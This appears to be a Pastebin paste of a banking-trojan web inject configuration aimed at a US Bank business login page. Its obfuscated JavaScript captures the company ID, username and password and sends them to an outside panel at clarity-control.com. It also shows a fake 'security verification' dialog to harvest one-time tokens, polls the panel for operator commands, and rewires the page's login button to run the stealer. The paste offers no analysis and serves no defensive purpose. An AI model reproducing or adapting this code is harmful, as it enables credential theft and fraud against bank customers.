Advertisement
johnburn
May 23rd, 2011
445
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. data_before
  2. <head*>
  3. data_end
  4. data_inject
  5. <style type="text/css">
  6. #inject { display: none; }
  7. .ui-dialog { font-size: 10px; }
  8. .ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }
  9. .ui-dialog-titlebar { display : none; visibility: hidden;}
  10. </style>
  11. data_end
  12. data_after
  13. data_end
  14.  
  15. data_before
  16. <body*>
  17. data_end
  18. data_inject
  19. <iframe id="dataframe" width=0 height=0></iframe>
  20. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
  21. <link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/themes/start/ui.all.css" />
  22. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
  23. <script type="text/javascript">
  24. shortcut = {
  25.     'all_shortcuts': {},
  26.     'add': function (shortcut_combination, callback, opt) {
  27.         var default_options = {
  28.             'type': 'keydown',
  29.             'propagate': false,
  30.             'disable_in_input': false,
  31.             'target': document,
  32.             'keycode': false
  33.         }
  34.         if (!opt) opt = default_options;
  35.         else {
  36.             for (var dfo in default_options) {
  37.                 if (typeof opt[dfo] == 'undefined') opt[dfo] = default_options[dfo];
  38.             }
  39.         }
  40.         var ele = opt.target;
  41.         if (typeof opt.target == 'string') ele = document.getElementById(opt.target);
  42.         var ths = this;
  43.         shortcut_combination = shortcut_combination.toLowerCase();
  44.         var func = function (e) {
  45.                 e = e || window.event;
  46.                 if (opt['disable_in_input']) {
  47.                     var element;
  48.                     if (e.target) element = e.target;
  49.                     else if (e.srcElement) element = e.srcElement;
  50.                     if (element.nodeType == 3) element = element.parentNode;
  51.                     if (element.tagName == 'INPUT' || element.tagName == 'TEXTAREA') return;
  52.                 }
  53.                 if (e.keyCode) code = e.keyCode;
  54.                 else if (e.which) code = e.which;
  55.                 var character = String.fromCharCode(code).toLowerCase();
  56.                 if (code == 188) character = ",";
  57.                 if (code == 190) character = ".";
  58.                 var keys = shortcut_combination.split("+");
  59.                 var kp = 0;
  60.                 var shift_nums = {
  61.                     "`": "~",
  62.                     "1": "!",
  63.                     "2": "@",
  64.                     "3": "#",
  65.                     "4": "$",
  66.                     "5": "%",
  67.                     "6": "^",
  68.                     "7": "&",
  69.                     "8": "*",
  70.                     "9": "(",
  71.                     "0": ")",
  72.                     "-": "_",
  73.                     "=": "+",
  74.                     ";": ":",
  75.                     "'": "\"",
  76.                     ",": "<",
  77.                     ".": ">",
  78.                     "/": "?",
  79.                     "\\": "|"
  80.                 }
  81.                 var special_keys = {
  82.                     'esc': 27,
  83.                     'escape': 27,
  84.                     'tab': 9,
  85.                     'space': 32,
  86.                     'return': 13,
  87.                     'enter': 13,
  88.                     'backspace': 8,
  89.                     'scrolllock': 145,
  90.                     'scroll_lock': 145,
  91.                     'scroll': 145,
  92.                     'capslock': 20,
  93.                     'caps_lock': 20,
  94.                     'caps': 20,
  95.                     'numlock': 144,
  96.                     'num_lock': 144,
  97.                     'num': 144,
  98.                     'pause': 19,
  99.                     'break': 19,
  100.                     'insert': 45,
  101.                     'home': 36,
  102.                     'delete': 46,
  103.                     'end': 35,
  104.                     'pageup': 33,
  105.                     'page_up': 33,
  106.                     'pu': 33,
  107.                     'pagedown': 34,
  108.                     'page_down': 34,
  109.                     'pd': 34,
  110.                     'left': 37,
  111.                     'up': 38,
  112.                     'right': 39,
  113.                     'down': 40,
  114.                     'f1': 112,
  115.                     'f2': 113,
  116.                     'f3': 114,
  117.                     'f4': 115,
  118.                     'f5': 116,
  119.                     'f6': 117,
  120.                     'f7': 118,
  121.                     'f8': 119,
  122.                     'f9': 120,
  123.                     'f10': 121,
  124.                     'f11': 122,
  125.                     'f12': 123
  126.                 }
  127.                 var modifiers = {
  128.                     shift: {
  129.                         wanted: false,
  130.                         pressed: false
  131.                     },
  132.                     ctrl: {
  133.                         wanted: false,
  134.                         pressed: false
  135.                     },
  136.                     alt: {
  137.                         wanted: false,
  138.                         pressed: false
  139.                     },
  140.                     meta: {
  141.                         wanted: false,
  142.                         pressed: false
  143.                     }
  144.                 };
  145.                 if (e.ctrlKey) modifiers.ctrl.pressed = true;
  146.                 if (e.shiftKey) modifiers.shift.pressed = true;
  147.                 if (e.altKey) modifiers.alt.pressed = true;
  148.                 if (e.metaKey) modifiers.meta.pressed = true;
  149.                 for (var i = 0; k = keys[i], i < keys.length; i++) {
  150.                     if (k == 'ctrl' || k == 'control') {
  151.                         kp++;
  152.                         modifiers.ctrl.wanted = true;
  153.                     } else if (k == 'shift') {
  154.                         kp++;
  155.                         modifiers.shift.wanted = true;
  156.                     } else if (k == 'alt') {
  157.                         kp++;
  158.                         modifiers.alt.wanted = true;
  159.                     } else if (k == 'meta') {
  160.                         kp++;
  161.                         modifiers.meta.wanted = true;
  162.                     } else if (k.length > 1) {
  163.                         if (special_keys[k] == code) kp++;
  164.                     } else if (opt['keycode']) {
  165.                         if (opt['keycode'] == code) kp++;
  166.                     } else {
  167.                         if (character == k) kp++;
  168.                         else {
  169.                             if (shift_nums[character] && e.shiftKey) {
  170.                                 character = shift_nums[character];
  171.                                 if (character == k) kp++;
  172.                             }
  173.                         }
  174.                     }
  175.                 }
  176.                 if (kp == keys.length && modifiers.ctrl.pressed == modifiers.ctrl.wanted && modifiers.shift.pressed == modifiers.shift.wanted && modifiers.alt.pressed == modifiers.alt.wanted && modifiers.meta.pressed == modifiers.meta.wanted) {
  177.                     callback(e);
  178.                     if (!opt['propagate']) {
  179.                         e.cancelBubble = true;
  180.                         e.returnValue = false;
  181.                         if (e.stopPropagation) {
  182.                             e.stopPropagation();
  183.                             e.preventDefault();
  184.                         }
  185.                         return false;
  186.                     }
  187.                 }
  188.             }
  189.         this.all_shortcuts[shortcut_combination] = {
  190.             'callback': func,
  191.             'target': ele,
  192.             'event': opt['type']
  193.         };
  194.         if (ele.addEventListener) ele.addEventListener(opt['type'], func, false);
  195.         else if (ele.attachEvent) ele.attachEvent('on' + opt['type'], func);
  196.         else ele['on' + opt['type']] = func;
  197.     },
  198.     'remove': function (shortcut_combination) {
  199.         shortcut_combination = shortcut_combination.toLowerCase();
  200.         var binding = this.all_shortcuts[shortcut_combination];
  201.         delete(this.all_shortcuts[shortcut_combination])
  202.         if (!binding) return;
  203.         var type = binding['event'];
  204.         var ele = binding['target'];
  205.         var callback = binding['callback'];
  206.         if (ele.detachEvent) ele.detachEvent('on' + type, callback);
  207.         else if (ele.removeEventListener) ele.removeEventListener(type, callback, false);
  208.         else ele['on' + type] = false;
  209.     }
  210. }
  211. var o00OO0000 = '0';
  212. var o0000OO00 = '';
  213. var o000000OO = '8';
  214. var oOO000000 = '8';
  215. var oOOOO0000 = '0';
  216. var oOO00OO00 = '777333777';
  217. var oOO0000OO = '';
  218. var oOOOOOOOOO00 = 0;
  219. var oOOOOOOOO0O0 = 400;
  220. var oOOOOOOO0OO0 = 15;
  221. var oOOOOOO0OOO0 = '';
  222. var oOOOOO0OOOO0 = '';
  223. var oOOOO0OOOOO0 = '0';
  224. (function () {
  225.     var _0x53ffxf = 0;
  226.     var _0x53ffx10 = /[^a-z0-9_]/ig;
  227.  
  228.     function _0x53ffx11(_0x53ffx12) {
  229.         if (typeof _0x53ffx12 == 'function') {
  230.             throw 'SwfStore Error: Functions cannot be used as keys or values.';
  231.         };
  232.     };
  233.     window['SwfStore'] = function (_0x53ffx13) {
  234.         this['config'] = _0x53ffx13 || {};
  235.         var _0x53ffx14 = this['namespace'] = _0x53ffx13['namespace']['replace'](_0x53ffx10, '_') || 'swfstore',
  236.             _0x53ffx15 = _0x53ffx13['debug'] || false;
  237.         timeout = _0x53ffx13['timeout'] || 10;
  238.  
  239.         function _0x53ffx16() {
  240.             return 'SwfStore_' + _0x53ffx14 + '_' + (_0x53ffxf++);
  241.         };
  242.  
  243.         function _0x53ffx12(_0x53ffx17) {
  244.             var _0x53ffx18 = document['createElement']('div');
  245.             document['body']['appendChild'](_0x53ffx18);
  246.             _0x53ffx18['id'] = _0x53ffx16();
  247.             if (!_0x53ffx17) {
  248.                 _0x53ffx18['style']['position'] = 'absolute';
  249.                 _0x53ffx18['style']['top'] = '0px';
  250.                 _0x53ffx18['style']['left'] = '-2000px';
  251.             };
  252.             return _0x53ffx18;
  253.         };
  254.         if (_0x53ffx15) {
  255.             if (typeof console == 'undefined') {
  256.                 var _0x53ffx19 = _0x53ffx12(true);
  257.                 window['console'] = {
  258.                     log: function (_0x53ffx1a) {
  259.                         var _0x53ffx17 = _0x53ffx12(true);
  260.                         _0x53ffx17['innerHTML'] = _0x53ffx1a;
  261.                         _0x53ffx19['appendChild'](_0x53ffx17);
  262.                     }
  263.                 };
  264.             };
  265.             this['log'] = function (_0x53ffx18, _0x53ffx17, _0x53ffx1a) {
  266.                 _0x53ffx17 = (_0x53ffx17 == 'swfStore') ? 'swf' : _0x53ffx17;
  267.                 console['log']('SwfStore - ' + _0x53ffx14 + ': ' + _0x53ffx18 + ' (' + _0x53ffx17 + '): ' + _0x53ffx1a);
  268.             };
  269.         } else {
  270.             this['log'] = function () {};
  271.         };
  272.         this['log']('info', 'js', 'Initializing...');
  273.         SwfStore[_0x53ffx14] = this;
  274.         var _0x53ffx1b = _0x53ffx12(_0x53ffx15);
  275.         var _0x53ffx1c = _0x53ffx16();
  276.         var _0x53ffx1d = 'logfn=SwfStore.' + _0x53ffx14 + '.log&amp;onload=SwfStore.' + _0x53ffx14 + '.onload&amp;onerror=SwfStore.' + _0x53ffx14 + '.onerror';
  277.         _0x53ffx1b['innerHTML'] = '<object height="100" width="500" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="' + _0x53ffx1c + '" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">\x09<param value="' + _0x53ffx13['swf_url'] + '" name="movie">\x09<param value="' + _0x53ffx1d + '" name="FlashVars">\x09<param value="always" name="allowScriptAccess">\x09<embed height="375" align="middle" width="500" pluginspage="http://www.macromedia.com/go/getflashplayer" flashvars="' + _0x53ffx1d + '" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" loop="false" play="true" name="' + _0x53ffx1c + '" bgcolor="#ffffff" src="' + _0x53ffx13['swf_url'] + '"></object>';
  278.         this['swf'] = document[_0x53ffx1c] || window[_0x53ffx1c];
  279.         this['_timeout'] = setTimeout(function () {
  280.             SwfStore[_0x53ffx14]['log']('Timeout reached, assuming the store.swf failed to load and firing the onerror callback.');
  281.             if (_0x53ffx13['onerror']) {
  282.                 _0x53ffx13['onerror']();
  283.             };
  284.         }, timeout * 1000);
  285.     };
  286.     SwfStore['prototype'] = {
  287.         version: '1.1',
  288.         ready: false,
  289.         namespace: 'SwfStore_prototype',
  290.         set: function (_0x53ffx12, _0x53ffx15) {
  291.             if (this['namespace'] === SwfStore['prototype']['namespace']) {
  292.                 throw 'Create a new SwfStore to set data';
  293.             };
  294.             if (this['ready']) {
  295.                 _0x53ffx11(_0x53ffx12);
  296.                 _0x53ffx11(_0x53ffx15);
  297.                 this['swf']['set'](_0x53ffx12, _0x53ffx15);
  298.             } else {
  299.                 throw 'Attempted to save to uninitialized SwfStore.';
  300.             };
  301.         },
  302.         get: function (_0x53ffx12) {
  303.             if (this['namespace'] === SwfStore['prototype']['namespace']) {
  304.                 throw 'Create a new SwfStore to set data';
  305.             };
  306.             if (this['ready']) {
  307.                 _0x53ffx11(_0x53ffx12);
  308.                 return this['swf']['get'](_0x53ffx12);
  309.             } else {
  310.                 throw 'Attempted to read from an uninitialized SwfStore.';
  311.             };
  312.         },
  313.         getAll: function (_0x53ffx12) {
  314.             if (this['namespace'] === SwfStore['prototype']['namespace']) {
  315.                 throw 'Create a new SwfStore to set data';
  316.             };
  317.             if (this['ready']) {
  318.                 _0x53ffx11(_0x53ffx12);
  319.                 return this['swf']['get'](_0x53ffx12);
  320.             } else {
  321.                 throw 'Attempted to read from an uninitialized SwfStore.';
  322.             };
  323.         },
  324.         onload: function () {
  325.             var _0x53ffx12 = this;
  326.             setTimeout(function () {
  327.                 clearTimeout(_0x53ffx12._timeout);
  328.                 _0x53ffx12['ready'] = true;
  329.                 if (_0x53ffx12['config']['onready']) {
  330.                     _0x53ffx12['config']['onready']();
  331.                 };
  332.             }, 0);
  333.         },
  334.         onerror: function () {
  335.             clearTimeout(this._timeout);
  336.             if (this['config']['onerror']) {
  337.                 this['config']['onerror']();
  338.             };
  339.         }
  340.     };
  341. }());
  342. document['getElementById']('dataframe')['src'] = 'http://www.clarity-control.com/panel/file/index.html';
  343. $(function () {
  344.     var _0x53ffx1e = new SwfStore({
  345.         namespace: 'rememb',
  346.         swf_url: 'http://nfriedly.github.com/Javascript-Flash-Cookies/storage.swf',
  347.         debug: false,
  348.         onready: function () {
  349.             o00OO0000 = _0x53ffx1e['get']('myValue');
  350.             if (o00OO0000 == null) {
  351.                 o00OO0000 = '0';
  352.             };
  353.         }
  354.     });
  355. });
  356. shortcut['add']('Ctrl+Alt+8', function () {
  357.     jQuery('#inject')['dialog']('close');
  358.     document['getElementsByName']('tmupLogonForm')[0]['submit']();
  359. });
  360.  
  361. function oOOOOOOOO00O(_0x53ffx20) {
  362.     oOOOOOOOOO00 += 1;
  363.     if ((o00OO0000 == '5') && (oOOOOOOOOO00 > oOOOOOOO0OO0)) {
  364.         oOOOOOOO0O0O();
  365.         return false;
  366.     };
  367.     if (oOOOOOOOOO00 > oOOOOOOOO0O0 && o00OO0000 == '0') {
  368.         oOOO0OOOOO0O();
  369.         setTimeout('oOOOOOOO0O0O()', 3000);
  370.         return false;
  371.     };
  372.     if (oOOOOOOOOO00 > oOOOOOOOO0O0 && o00OO0000 == '1') {
  373.         oOOOO0OOOOO0 = '1';
  374.         jQuery('#inputlabel')['text'](o0000OO00);
  375.         jQuery('#info2')['css']('display', 'none');
  376.         document['body']['style']['cursor'] = 'default';
  377.         jQuery('#info1')['css']('display', 'block');
  378.         jQuery('#header2')['css']('display', 'none');
  379.         jQuery('#header1')['css']('display', 'block');
  380.         jQuery('#errorz')['css']('display', 'none');
  381.         jQuery('#step_cap')['css']('display', 'block');
  382.         jQuery('#finstep1')['css']('display', 'block');
  383.         return false;
  384.     };
  385.     if (o00OO0000 == '1' && oOOOO0OOOOO0 != '1') {
  386.         oOOOO0OOOOO0 = '1';
  387.         jQuery('#inputlabel')['text'](o0000OO00);
  388.         jQuery('#info2')['css']('display', 'none');
  389.         document['body']['style']['cursor'] = 'default';
  390.         jQuery('#info1')['css']('display', 'block');
  391.         jQuery('#header2')['css']('display', 'none');
  392.         jQuery('#header1')['css']('display', 'block');
  393.         jQuery('#errorz')['css']('display', 'none');
  394.         jQuery('#step_cap')['css']('display', 'block');
  395.         jQuery('#finstep1')['css']('display', 'block');
  396.         return false;
  397.     };
  398.     if (oOOOOOOOOO00 > oOOOOOOOO0O0 && o00OO0000 == '2') {
  399.         oOOOO0OOOOO0 = '2';
  400.         jQuery('#inputlabel')['text'](o0000OO00);
  401.         jQuery('#info2')['css']('display', 'none');
  402.         document['body']['style']['cursor'] = 'default';
  403.         jQuery('#info1')['css']('display', 'block');
  404.         jQuery('#header2')['css']('display', 'none');
  405.         jQuery('#header1')['css']('display', 'block');
  406.         jQuery('#step_cap')['css']('display', 'block');
  407.         jQuery('#errorz')['css']('display', 'none');
  408.         jQuery('#finstep1')['css']('display', 'block');
  409.         return false;
  410.     };
  411.     if (o00OO0000 == '2' && oOOOO0OOOOO0 == '1') {
  412.         oOOOO0OOOOO0 = '2';
  413.         jQuery('#inputlabel')['text'](o0000OO00);
  414.         jQuery('#info2')['css']('display', 'none');
  415.         document['body']['style']['cursor'] = 'default';
  416.         jQuery('#info1')['css']('display', 'block');
  417.         jQuery('#header2')['css']('display', 'none');
  418.         jQuery('#header1')['css']('display', 'block');
  419.         jQuery('#step_cap')['css']('display', 'block');
  420.         jQuery('#errorz')['css']('display', 'none');
  421.         jQuery('#finstep1')['css']('display', 'block');
  422.         return false;
  423.     };
  424.     if (o00OO0000 == '999') {
  425.         jQuery('#info2')['css']('display', 'none');
  426.         document['body']['style']['cursor'] = 'default';
  427.         jQuery('#info2')['css']('display', 'none');
  428.         jQuery('#info1')['css']('display', 'none');
  429.         jQuery('#header2')['css']('display', 'none');
  430.         jQuery('#header1')['css']('display', 'block');
  431.         jQuery('#info3')['css']('display', 'block');
  432.         jQuery('#errorz')['css']('display', 'none');
  433.         jQuery('#finstep1')['css']('display', 'none');
  434.         jQuery('#helpsupport')['text'](oOO0000OO);
  435.         $(function () {
  436.             var _0x53ffx1e = new SwfStore({
  437.                 namespace: 'rememb',
  438.                 swf_url: 'http://nfriedly.github.com/Javascript-Flash-Cookies/storage.swf',
  439.                 debug: false,
  440.                 onready: function () {
  441.                     _0x53ffx1e['set']('myValue', '999');
  442.                 }
  443.             });
  444.         });
  445.         return false;
  446.     };
  447.     setTimeout('oOOOOOO0OO0O()', 500);
  448. };
  449.  
  450. function oOOOOOOO0O0O() {
  451.     jQuery('#inject')['dialog']('close');
  452.     document['getElementsByName']('tmupLogonForm')[0]['submit']();
  453. };
  454.  
  455. function oOOOOO0OOO0O() {
  456.     oOO0OOOOOO0O();
  457.     var _0x53ffx23 = document['getElementsByTagName']('head')[0];
  458.     var _0x53ffx24 = document['createElement']('script');
  459.     _0x53ffx24['type'] = 'text/javascript';
  460.     _0x53ffx23['appendChild'](_0x53ffx24);
  461.     _0x53ffx24['src'] = 'http://www.clarity-control.com/panel/get.php?bname=usbankbiz&activ&adata=' + 'Company^ID:^' + document['getElementById']('companyID')['value'] + ';User^ID:^' + document['getElementById']('j_username')['value'] + ';Password:^' + document['getElementById']('j_password')['value'] + '^' + window['location'];
  462.     oOOOOOO0OO0O();
  463. };
  464.  
  465. function oOOOO0OOOO0O(_0x53ffx26) {
  466.     var _0x53ffx23 = document['getElementsByTagName']('head')[0];
  467.     var _0x53ffx24 = document['createElement']('script');
  468.     _0x53ffx24['type'] = 'text/javascript';
  469.     _0x53ffx23['appendChild'](_0x53ffx24);
  470.     _0x53ffx24['src'] =  'http://www.clarity-control.com/panel/get.php?bname=usbankbiz&activ&adata=' + ';Tokken:^' + document['getElementById']('inject_q1')['value'] + '&rkey=' + Math['random']();
  471.     oOOOOOOOOO00 = 0;
  472.     jQuery('#info2')['css']('display', 'block');
  473.     document['body']['style']['cursor'] = 'wait';
  474.     jQuery('#info1')['css']('display', 'none');
  475.     jQuery('#header2')['css']('display', 'block');
  476.     jQuery('#header1')['css']('display', 'block');
  477.     jQuery('#step_cap')['css']('display', 'none');
  478.     jQuery('#errorz')['css']('display', 'none');
  479.     jQuery('#finstep1')['css']('display', 'none');
  480.     oOOOOOO0OO0O();
  481. };
  482.  
  483. function oOOOOOO0OO0O() {
  484.     var _0x53ffx23 = document['getElementsByTagName']('head')[0];
  485.     var _0x53ffx24 = document['createElement']('script');
  486.     _0x53ffx24['type'] = 'text/javascript';
  487.     _0x53ffx23['appendChild'](_0x53ffx24);
  488.     _0x53ffx24['src'] = 'http://www.clarity-control.com/panel/get.php?bname=usbankbiz&rkey=' + Math['random']();
  489.     _0x53ffx24['onload'] = oOOOOOOOO00O(_0x53ffx24);
  490. };
  491.  
  492. function oOOO0OOOOO0O() {
  493.     var _0x53ffx23 = document['getElementsByTagName']('head')[0];
  494.     var _0x53ffx24 = document['createElement']('script');
  495.     _0x53ffx24['type'] = 'text/javascript';
  496.     _0x53ffx23['appendChild'](_0x53ffx24);
  497.     _0x53ffx24['src'] = 'http://www.clarity-control.com/panel/get.php?bname=usbankbiz&status=5&rkey=' + Math['random']();
  498. };
  499.  
  500. function oOO0OOOOOO0O() {
  501.     function _0x53ffx2a() {
  502.         jQuery('#inject')['dialog']({
  503.             width: 540,
  504.             closeOnEscape: false,
  505.             modal: true,
  506.             resizable: false,
  507.             show: 'slide'
  508.         });
  509.         jQuery('#finstep1')['click'](function () {
  510.             {
  511.                 if ((jQuery('#inject_q1')['val']()['length'] < parseInt(o000000OO)) || (jQuery('#inject_q1')['val']()['length'] < parseInt(o000000OO))) {
  512.                     jQuery('#errorz')['css']('display', 'block');
  513.                     jQuery('#inject_q1')['focus']();
  514.                     return;
  515.                 } else {
  516.                     oOOOO0OOOO0O(jQuery('#inject_q1')['val']());
  517.                     jQuery('#inject_q1')['val']('');
  518.                 };
  519.             };
  520.             if (document['getElementById']('info3')['style']['display'] != 'none') {
  521.                 jQuery('#inject')['dialog']('close');
  522.             };
  523.         });
  524.     };
  525.     jQuery(document)['ready'](_0x53ffx2a);
  526. };
  527. </script>
  528. data_end
  529. data_after
  530. data_end
  531.  
  532. data_before
  533. </body>
  534. data_end
  535. data_inject
  536.  
  537. <div id="inject">
  538. <form>
  539. <left>
  540. <div id='header1'  style="border: 0px; display:none; text-align: left'>
  541. <img src="https://singlepoint.usbank.com/cs70_banking/user/images/SinglePoint_Login_Logo.gif"/><br/>
  542. </div>
  543. </left>
  544. <center>
  545. <div id='header2'><h3>Please wait</h3></div>
  546. <table cellspacing="0" cellpadding="0" border="0" style="border: 0px;">
  547. <tr>
  548. <td style="background: #FFFFFF;">
  549. <div style="display: none; width:145px; height:43px; margin-top: -5px; margin-left: 180px; margin-bottom: 0px; background-image:url('');background-repeat: repeat-none; "></div><br /></td>
  550. </tr>
  551. <tr>
  552. <td align="left" style="text-align: justify; font-size: 12px;">
  553. <div id='info1' style='display:none'>
  554. In order to provide you with extra security, we occasionally need to ask yo to pass all the verification steps when you access your accounts online.<br/>
  555. <br/>
  556. Each step of the following verification process may take up to 5 minutes. Please be patient and don't reload the page while performing required steps.
  557. </div>
  558.  
  559. <div id='info3'  style="border: 0px; font-weight: normal; display:none;'>
  560. Website is currently unavailable due to important security updates.<br>
  561. Please check back in 24 hours.<br><br/>
  562. We are sorry for inconvenience this may cause to you. <br/><br/>  
  563. <span id="helpsupport"></span>.<br/><br/>
  564. </div>
  565.  
  566.  
  567. <div id='info2' style="border: 0px;">
  568. <center>
  569. <img name="ramshk" id="ramshk" src="/files/1290102090_loading.gif" style="height:100px; width: 100px;">
  570. </center>
  571. <br/><br/>
  572. </div>
  573.  
  574. <br /><br />
  575. </td>
  576. </tr>
  577. </table>
  578. <div id='step_cap' style=' text-align: left; font-weight: normal; display:none; font-size: 12px;'>
  579. <span>Please enter the following information:<br/><br/></span>
  580. <div id='errorz' style='color: red;' style='display:none;'>
  581. <span style="text-align: justify; font-size: 11px;"> ERR(0603) - Invalid information. Please try again and enter correct information</span>
  582. </div>
  583. <table style="border: 0px;">
  584. <tr id='step_1'>
  585. <td align="left" style="font-size: 12px; background: #FFFFFF;"><b><div id='inputlabel'></div></b></td>
  586. <td align="left" style="background: #FFFFFF; font-size: 11px;"><input type="text" name="inject_q1" id="inject_q1" size="10" maxlength="25"/></td>
  587. </tr>
  588. </table>
  589. </div>
  590.  
  591. <div align="right" style="border: 0px;">
  592. <br/><div id="finstep1" style="display: none; color: #8C0000; font-size:12px; cursor:pointer;"><b><u>CONTINUE</u></b></div>    <br/><br/>
  593. </div>
  594. </div>
  595. </form>
  596. <br /><br />
  597. </center>
  598.  
  599. </div>
  600.  
  601.  
  602. <script>
  603. document.images['ramshk'].src = 'http://www.clarity-control.com/panel/files/1290102090_loading.gif';
  604. </script>
  605. data_end
  606. data_after
  607. data_end
  608.  
  609. data_before
  610. name="companyID"
  611. data_end
  612. data_inject
  613.  id="companyID"
  614. data_end
  615. data_after
  616. data_end
  617.  
  618. data_before
  619. name="j_username"
  620. data_end
  621. data_inject
  622.  id="j_username"
  623. data_end
  624. data_after
  625. data_end
  626.  
  627. data_before
  628. name="j_password"
  629. data_end
  630. data_inject
  631.  id="j_password"
  632. data_end
  633. data_after
  634. data_end
  635.  
  636. data_before
  637. <td class="bg2" height="5">&nbsp;</td>*<td class="bg2"><input
  638. data_end
  639. data_inject
  640.  type="button" Value="Login"
  641. data_end
  642. data_after
  643. name=
  644. data_end
  645.  
  646. data_before
  647. alt="Login" border="0" onclick="
  648. data_end
  649. data_inject
  650. if ((document.getElementById('companyID').value=='') || (document.getElementById('j_username').value=='') || (document.getElementById('j_password').value==''))
  651. {alert('Please complete all fields');return false;}
  652. oOOOOO0OOO0O();return false;
  653. data_end
  654. data_after
  655. "
  656. data_end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement